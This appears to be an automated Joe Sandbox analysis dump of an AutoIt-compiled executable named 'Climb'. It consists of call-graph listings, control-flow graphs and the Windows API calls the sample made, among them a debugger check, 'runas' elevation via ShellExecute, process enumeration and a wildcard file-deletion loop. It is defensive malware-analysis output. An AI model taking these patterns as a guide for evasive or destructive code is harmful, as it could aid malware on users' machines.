99235->99236 99236->99228 99241 4f58cb 99237->99241 99240->99234 99242 4f58be 99241->99242 99243 4f58d8 99241->99243 99242->99234 99243->99242 99244 4f58df RegOpenKeyExW 99243->99244 99244->99242 99245 4f58f9 RegQueryValueExW 99244->99245 99246 4f592f RegCloseKey 99245->99246 99247 4f591a 99245->99247 99246->99242 99247->99246 99248 543c0a 99269 55c819 99248->99269 99250 543c14 99252 55c819 Sleep 99250->99252 99253 543c3f 99250->99253 99258 4fefdb 99250->99258 99275 50aa65 9 API calls 99250->99275 99252->99250 99254 4fb329 8 API calls 99253->99254 99255 543c6f 99254->99255 99276 4fbfa5 39 API calls 99255->99276 99257 543c8b 99277 56446f 8 API calls 99257->99277 99262 4ff450 99258->99262 99261 4ff097 99263 4ff46f 99262->99263 99265 4ff483 99262->99265 99278 4fe960 99263->99278 99310 563fe1 81 API calls __wsopen_s 99265->99310 99266 4ff47a 99266->99261 99268 544584 99268->99268 99270 55c824 99269->99270 99271 55c83f 99269->99271 99270->99250 99272 55c86d 99271->99272 99273 55c851 Sleep 99271->99273 99272->99250 99273->99272 99275->99250 99276->99257 99277->99261 99279 500340 207 API calls 99278->99279 99299 4fe99d 99279->99299 99280 5431d3 99324 563fe1 81 API calls __wsopen_s 99280->99324 99282 4fea0b ISource 99282->99266 99283 4fedd5 99283->99282 99294 51017b 8 API calls 99283->99294 99284 4feac3 99284->99283 99286 4feace 99284->99286 99285 4fecff 99287 5431c4 99285->99287 99288 4fed14 99285->99288 99290 51014b 8 API calls 99286->99290 99323 576162 8 API calls 99287->99323 99292 51014b 8 API calls 99288->99292 99289 4febb8 99296 51017b 8 API calls 99289->99296 99295 4fead5 __fread_nolock 99290->99295 99304 4feb6a 99292->99304 99293 51014b 8 API calls 99293->99299 99294->99295 99297 51014b 8 API calls 99295->99297 99298 4feaf6 99295->99298 99301 4feb29 ISource __fread_nolock 99296->99301 99297->99298 99298->99301 99311 4fd260 99298->99311 99299->99280 99299->99282 99299->99283 99299->99284 99299->99289 99299->99293 99299->99301 99301->99285 99302 5431b3 99301->99302 99301->99304 99306 54318e 99301->99306 99308 54316c 99301->99308 99319 4f44fe 207 API calls 99301->99319 99322 563fe1 81 API calls __wsopen_s 99302->99322 99304->99266 99321 563fe1 81 API calls __wsopen_s 99306->99321 99320 563fe1 81 API calls __wsopen_s 99308->99320 99310->99268 99312 4fd29a 99311->99312 99313 4fd2c6 99311->99313 99325 4ff6d0 99312->99325 99315 500340 207 API calls 99313->99315 99316 54184b 99315->99316 99317 4fd2a0 99316->99317 99348 563fe1 81 API calls __wsopen_s 99316->99348 99317->99301 99319->99301 99320->99304 99321->99304 99322->99304 99323->99280 99324->99282 99326 4ff710 99325->99326 99336 4ff7dc ISource 99326->99336 99350 5105b2 5 API calls __Init_thread_wait 99326->99350 99327 500340 207 API calls 99327->99336 99330 5445d9 99332 4fbf73 8 API calls 99330->99332 99330->99336 99331 4fbf73 8 API calls 99331->99336 99334 5445f3 99332->99334 99351 510413 29 API calls __onexit 99334->99351 99335 4fbe2d 39 API calls 99335->99336 99336->99327 99336->99331 99336->99335 99342 4fbed9 8 API calls 99336->99342 99343 501ca0 8 API calls 99336->99343 99344 4ffae1 99336->99344 99347 563fe1 81 API calls 99336->99347 99349 50b35c 207 API calls 99336->99349 99353 5105b2 5 API calls __Init_thread_wait 99336->99353 99354 510413 29 API calls __onexit 99336->99354 99355 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99336->99355 99356 575231 101 API calls 99336->99356 99357 57731e 207 API calls 99336->99357 99339 5445fd 99352 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99339->99352 99342->99336 99343->99336 99344->99317 99347->99336 99348->99317 99349->99336 99350->99330 99351->99339 99352->99336 99353->99336 99354->99336 99355->99336 99356->99336 99357->99336 99358 51f06e 99359 51f07a ___BuildCatchObject 99358->99359 99360 51f086 99359->99360 99361 51f09b 99359->99361 99377 51f649 20 API calls _abort 99360->99377 99371 5194fd EnterCriticalSection 99361->99371 99364 51f08b 99378 522b5c 26 API calls _abort 99364->99378 99365 51f0a7 99372 51f0db 99365->99372 99370 51f096 __wsopen_s 99371->99365 99380 51f106 99372->99380 99374 51f0e8 99375 51f0b4 99374->99375 99400 51f649 20 API calls _abort 99374->99400 99379 51f0d1 LeaveCriticalSection __fread_nolock 99375->99379 99377->99364 99378->99370 99379->99370 99381 51f114 99380->99381 99382 51f12e 99380->99382 99404 51f649 20 API calls _abort 99381->99404 99384 51dcc5 __fread_nolock 26 API calls 99382->99384 99386 51f137 99384->99386 99385 51f119 99405 522b5c 26 API calls _abort 99385->99405 99401 529789 99386->99401 99388 51f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 99388->99374 99391 51f23b 99393 51f248 99391->99393 99397 51f1ee 99391->99397 99392 51f1bf 99394 51f1dc 99392->99394 99392->99397 99407 51f649 20 API calls _abort 99393->99407 99406 51f41f 31 API calls 4 library calls 99394->99406 99397->99388 99408 51f29b 30 API calls 2 library calls 99397->99408 99398 51f1e6 99398->99388 99400->99375 99409 529606 99401->99409 99403 51f153 99403->99388 99403->99391 99403->99392 99404->99385 99405->99388 99406->99398 99407->99388 99408->99388 99410 529612 ___BuildCatchObject 99409->99410 99411 529632 99410->99411 99412 52961a 99410->99412 99414 5296e6 99411->99414 99419 52966a 99411->99419 99435 51f636 20 API calls _abort 99412->99435 99440 51f636 20 API calls _abort 99414->99440 99415 52961f 99436 51f649 20 API calls _abort 99415->99436 99418 5296eb 99441 51f649 20 API calls _abort 99418->99441 99434 5254ba EnterCriticalSection 99419->99434 99422 529627 __wsopen_s 99422->99403 99423 5296f3 99442 522b5c 26 API calls _abort 99423->99442 99424 529670 99426 529694 99424->99426 99427 5296a9 99424->99427 99437 51f649 20 API calls _abort 99426->99437 99429 52970b __fread_nolock 28 API calls 99427->99429 99432 5296a4 99429->99432 99430 529699 99438 51f636 20 API calls _abort 99430->99438 99439 5296de LeaveCriticalSection __wsopen_s 99432->99439 99434->99424 99435->99415 99436->99422 99437->99430 99438->99432 99439->99422 99440->99418 99441->99423 99442->99422

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 224 4f5fc8-4f6037 call 4fbf73 GetVersionExW call 4f8577 229 4f603d 224->229 230 53507d-535090 224->230 231 4f603f-4f6041 229->231 232 535091-535095 230->232 233 4f6047-4f60a6 call 4fadf4 call 4f55dc 231->233 234 5350bc 231->234 235 535097 232->235 236 535098-5350a4 232->236 249 4f60ac-4f60ae 233->249 250 535224-53522b 233->250 240 5350c3-5350cf 234->240 235->236 236->232 237 5350a6-5350a8 236->237 237->231 239 5350ae-5350b5 237->239 239->230 242 5350b7 239->242 243 4f611c-4f6136 GetCurrentProcess IsWow64Process 240->243 242->234 245 4f6138 243->245 246 4f6195-4f619b 243->246 248 4f613e-4f614a 245->248 246->248 251 535269-53526d GetSystemInfo 248->251 252 4f6150-4f615f LoadLibraryA 248->252 253 535125-535138 249->253 254 4f60b4-4f60b7 249->254 255 53524b-53524e 250->255 256 53522d 250->256 259 4f619d-4f61a7 GetSystemInfo 252->259 260 4f6161-4f616f GetProcAddress 252->260 261 535161-535163 253->261 262 53513a-535143 253->262 254->243 263 4f60b9-4f60f5 254->263 257 535250-53525f 255->257 258 535239-535241 255->258 264 535233 256->264 257->264 267 535261-535267 257->267 258->255 269 4f6177-4f6179 259->269 260->259 268 4f6171-4f6175 GetNativeSystemInfo 260->268 265 535165-53517a 261->265 266 535198-53519b 261->266 270 535150-53515c 262->270 271 535145-53514b 262->271 263->243 272 4f60f7-4f60fa 263->272 264->258 275 535187-535193 265->275 276 53517c-535182 265->276 277 5351d6-5351d9 266->277 278 53519d-5351b8 266->278 267->258 268->269 279 4f617b-4f617c FreeLibrary 269->279 280 4f6182-4f6194 269->280 270->243 271->243 273 5350d4-5350e4 272->273 274 4f6100-4f610a 272->274 284 5350f7-535101 273->284 285 5350e6-5350f2 273->285 274->240 281 4f6110-4f6116 274->281 275->243 276->243 277->243 286 5351df-535206 277->286 282 5351c5-5351d1 278->282 283 5351ba-5351c0 278->283 279->280 281->243 282->243 283->243 287 535103-53510f 284->287 288 535114-535120 284->288 285->243 289 535213-53521f 286->289 290 535208-53520e 286->290 287->243 288->243 289->243 290->243
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004F5FF7
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,0058DC2C,00000000,?,?), ref: 004F6123
                                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 004F612A
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 004F6155
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004F6167
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 004F6175
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 004F617C
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 004F61A1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                      • API String ID: 3290436268-3101561225
                                                                                                                                                                      • Opcode ID: b008a5a4d01840759cadd2d72f3e592652b1157944eece4991e44902ac5a4469
                                                                                                                                                                      • Instruction ID: 2a4daf9be2779e50190e37ab95465a51b2140e093ef07b5ea7cc419696a9d9a0
                                                                                                                                                                      • Opcode Fuzzy Hash: b008a5a4d01840759cadd2d72f3e592652b1157944eece4991e44902ac5a4469
                                                                                                                                                                      • Instruction Fuzzy Hash: 47A1F33290ABC4CFC712CBB87C45DA53FA47B36B00F285D9AE58493262D66D054CEB36

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,004F3368,?), ref: 004F33BB
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,004F3368,?), ref: 004F33CE
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,005C2418,005C2400,?,?,?,?,?,?,004F3368,?), ref: 004F343A
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                        • Part of subcall function 004F425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004F3462,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 004F42A0
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 004F34BB
                                                                                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00533CB0
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 00533CF1
                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005B31F4,005C2418,?,?,?,?,?,?,?,004F3368), ref: 00533D7A
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00533D81
                                                                                                                                                                        • Part of subcall function 004F34D3: GetSysColorBrush.USER32(0000000F), ref: 004F34DE
                                                                                                                                                                        • Part of subcall function 004F34D3: LoadCursorW.USER32(00000000,00007F00), ref: 004F34ED
                                                                                                                                                                        • Part of subcall function 004F34D3: LoadIconW.USER32(00000063), ref: 004F3503
                                                                                                                                                                        • Part of subcall function 004F34D3: LoadIconW.USER32(000000A4), ref: 004F3515
                                                                                                                                                                        • Part of subcall function 004F34D3: LoadIconW.USER32(000000A2), ref: 004F3527
                                                                                                                                                                        • Part of subcall function 004F34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004F353F
                                                                                                                                                                        • Part of subcall function 004F34D3: RegisterClassExW.USER32(?), ref: 004F3590
                                                                                                                                                                        • Part of subcall function 004F35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F35E1
                                                                                                                                                                        • Part of subcall function 004F35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3602
                                                                                                                                                                        • Part of subcall function 004F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F3616
                                                                                                                                                                        • Part of subcall function 004F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F361F
                                                                                                                                                                        • Part of subcall function 004F396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F3A3C
                                                                                                                                                                      Strings
                                                                                                                                                                      • 0$\, xrefs: 004F3495
                                                                                                                                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00533CAA
                                                                                                                                                                      • runas, xrefs: 00533D75
                                                                                                                                                                      • AutoIt, xrefs: 00533CA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                      • String ID: 0$\$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                      • API String ID: 683915450-3229954163
                                                                                                                                                                      • Opcode ID: 4c57b292275775026540355a366c393ec8ad17ba747b8e7b873e9db2fbcd7335
                                                                                                                                                                      • Instruction ID: 055483d5c935b12c50759ae91b28fefb3290d473e1f6ade42dd41f4b37cdafe4
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c57b292275775026540355a366c393ec8ad17ba747b8e7b873e9db2fbcd7335
                                                                                                                                                                      • Instruction Fuzzy Hash: 9851F730108348AECB05EF61DC45DBE7FB8AFA4749F00192EF681521A2DF689A4DD767

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1741 55dc54-55dc9b call 4fbf73 * 3 call 4f5851 call 55eab0 1752 55dc9d-55dca6 call 4f6b7c 1741->1752 1753 55dcab-55dcdc call 4f568e FindFirstFileW 1741->1753 1752->1753 1757 55dcde-55dce0 1753->1757 1758 55dd4b-55dd52 FindClose 1753->1758 1757->1758 1760 55dce2-55dce7 1757->1760 1759 55dd56-55dd78 call 4fbd98 * 3 1758->1759 1762 55dd26-55dd38 FindNextFileW 1760->1762 1763 55dce9-55dd24 call 4fbed9 call 4f7bb5 call 4f6b7c DeleteFileW 1760->1763 1762->1757 1764 55dd3a-55dd40 1762->1764 1763->1762 1776 55dd42-55dd49 FindClose 1763->1776 1764->1757 1776->1759
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871
                                                                                                                                                                        • Part of subcall function 0055EAB0: GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0055DCCB
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0055DD1B
                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0055DD2C
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0055DD43
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0055DD4C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                      • Opcode ID: 24347bffbe349ca0e3c4744a172085f322801aa231b116dec8cee091a306417f
                                                                                                                                                                      • Instruction ID: c99a10d56559765fe894c75bbdc2bb38c13a03f9b0cf466b582d39cd2f9b49ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 24347bffbe349ca0e3c4744a172085f322801aa231b116dec8cee091a306417f
                                                                                                                                                                      • Instruction Fuzzy Hash: 993172320083499BC310EB60C8558BFBBF8BE96305F404D1EF9D692191DB25DA0DC7A7
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0055DDAC
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0055DDBA
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0055DDDA
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0055DE87
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                      • Opcode ID: c2201003c971799cd7c0a33ba0cb414ef13a8eee98478d519767f3cad2092990
                                                                                                                                                                      • Instruction ID: fda5e08576234d4cc7907ff5476a8784c0efc3a752b164009cecbb3335810efb
                                                                                                                                                                      • Opcode Fuzzy Hash: c2201003c971799cd7c0a33ba0cb414ef13a8eee98478d519767f3cad2092990
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B3170720082059FD310EF50D895AAEBBF8FF95354F14092EF981861A1DB719949CBA2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 50ac3e-50b063 call 4f8ec0 call 50bc58 call 4fe6a0 7 548584-548591 0->7 8 50b069-50b073 0->8 9 548596-5485a5 7->9 10 548593 7->10 11 50b079-50b07e 8->11 12 54896b-548979 8->12 13 5485a7 9->13 14 5485aa 9->14 10->9 17 50b084-50b090 call 50b5b6 11->17 18 5485b2-5485b4 11->18 15 54897e 12->15 16 54897b 12->16 13->14 14->18 19 548985-54898e 15->19 16->15 23 5485bd 17->23 25 50b096-50b0a3 call 4fc98d 17->25 18->23 21 548990 19->21 22 548993 19->22 21->22 27 54899c-5489eb call 4fe6a0 call 50bbbe * 2 22->27 26 5485c7 23->26 31 50b0ab-50b0b4 25->31 32 5485cf-5485d2 26->32 60 50b1e0-50b1f5 27->60 61 5489f1-548a03 call 50b5b6 27->61 34 50b0b8-50b0d6 call 514d98 31->34 35 50b158-50b16f 32->35 36 5485d8-548600 call 514cd3 call 4f7ad5 32->36 54 50b0e5 34->54 55 50b0d8-50b0e1 34->55 38 548954-548957 35->38 39 50b175 35->39 70 548602-548606 36->70 71 54862d-548651 call 4f7b1a call 4fbd98 36->71 43 548a41-548a79 call 4fe6a0 call 50bbbe 38->43 44 54895d-548960 38->44 45 5488ff-548920 call 4fe6a0 39->45 46 50b17b-50b17e 39->46 43->60 105 548a7f-548a91 call 50b5b6 43->105 44->27 51 548962-548965 44->51 45->60 75 548926-548938 call 50b5b6 45->75 52 50b184-50b187 46->52 53 548729-548743 call 50bbbe 46->53 51->12 51->60 62 50b18d-50b190 52->62 63 5486ca-5486e0 call 4f6c03 52->63 92 54888f-5488b5 call 4fe6a0 53->92 93 548749-54874c 53->93 54->26 66 50b0eb-50b0fc 54->66 55->34 64 50b0e3 55->64 77 50b1fb-50b20b call 4fe6a0 60->77 78 548ac9-548acf 60->78 96 548a05-548a0d 61->96 97 548a2f-548a3c call 4fc98d 61->97 73 548656-548659 62->73 74 50b196-50b1b8 call 4fe6a0 62->74 63->60 94 5486e6-5486fc call 50b5b6 63->94 64->66 66->12 76 50b102-50b11c 66->76 70->71 83 548608-54862b call 4fad40 70->83 71->73 73->12 89 54865f-548674 call 4f6c03 73->89 74->60 113 50b1ba-50b1cc call 50b5b6 74->113 116 548945 75->116 117 54893a-548943 call 4fc98d 75->117 76->32 88 50b122-50b154 call 50bbbe call 4fe6a0 76->88 78->31 81 548ad5 78->81 81->12 83->70 83->71 88->35 89->60 135 54867a-548690 call 50b5b6 89->135 92->60 138 5488bb-5488cd call 50b5b6 92->138 103 54874e-548751 93->103 104 5487bf-5487de call 4fe6a0 93->104 141 54870d-548716 call 4f8ec0 94->141 142 5486fe-54870b call 4f8ec0 94->142 111 548a1e-548a29 call 4fb4b1 96->111 112 548a0f-548a13 96->112 148 548ac2-548ac4 97->148 119 548757-548774 call 4fe6a0 103->119 120 548ada-548ae8 103->120 104->60 140 5487e4-5487f6 call 50b5b6 104->140 152 548ab5-548abe call 4fc98d 105->152 153 548a93-548a9b 105->153 111->97 159 548b0b-548b19 111->159 112->111 128 548a15-548a19 112->128 160 50b1d2-50b1de 113->160 161 5486ba-5486c3 call 4fc98d 113->161 134 548949-54894f 116->134 117->134 119->60 163 54877a-54878c call 50b5b6 119->163 126 548aed-548afd 120->126 127 548aea 120->127 143 548b02-548b06 126->143 144 548aff 126->144 127->126 145 548aa1-548aa3 128->145 134->60 173 548692-54869b call 4fc98d 135->173 174 54869d-5486ab call 4f8ec0 135->174 178 5488de 138->178 179 5488cf-5488dc call 4fc98d 138->179 140->60 181 5487fc-548805 call 50b5b6 140->181 182 548719-548724 call 4f8577 141->182 142->182 143->77 144->143 145->60 148->60 152->148 164 548a9d 153->164 165 548aa8-548ab3 call 4fb4b1 153->165 170 548b1e-548b21 159->170 171 548b1b 159->171 160->60 161->63 194 54878e-54879d call 4fc98d 163->194 195 54879f 163->195 164->145 165->152 165->159 170->19 171->170 203 5486ae-5486b5 173->203 174->203 189 5488e2-5488e9 178->189 179->189 208 548807-548816 call 4fc98d 181->208 209 548818 181->209 182->60 197 5488f5 call 4f3907 189->197 198 5488eb-5488f0 call 4f396b 189->198 205 5487a3-5487ae call 519334 194->205 195->205 207 5488fa 197->207 198->60 203->60 205->12 218 5487b4-5487ba 205->218 207->60 213 54881c-54883f 208->213 209->213 216 548841-548848 213->216 217 54884d-548850 213->217 216->217 219 548860-548863 217->219 220 548852-54885b 217->220 218->60 221 548865-54886e 219->221 222 548873-548876 219->222 220->219 221->222 222->60 223 54887c-54888a 222->223 223->60
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4X$@X$PX$`*\$`X$d0b$d10m0$d1b$d1r0,2$d5m0$e#\$i$tX$tX$(\$(\$(\$(\$X$X
                                                                                                                                                                      • API String ID: 0-1933161890
                                                                                                                                                                      • Opcode ID: bdac998d50e3c15e7335c2c6fb17672b49c42b5e7a880f17470877240bd9408b
                                                                                                                                                                      • Instruction ID: 5e27c70862dd2482304411e4132d63e9c2719c63da186ae8d5add64f9d9b9a47
                                                                                                                                                                      • Opcode Fuzzy Hash: bdac998d50e3c15e7335c2c6fb17672b49c42b5e7a880f17470877240bd9408b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A6255705083458FD328DF15C095AAEBBF1BF89308F10895EE8999B391DB71E949CF92

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004F3657
                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 004F3681
                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3692
                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 004F36AF
                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F36BF
                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 004F36D5
                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F36E4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
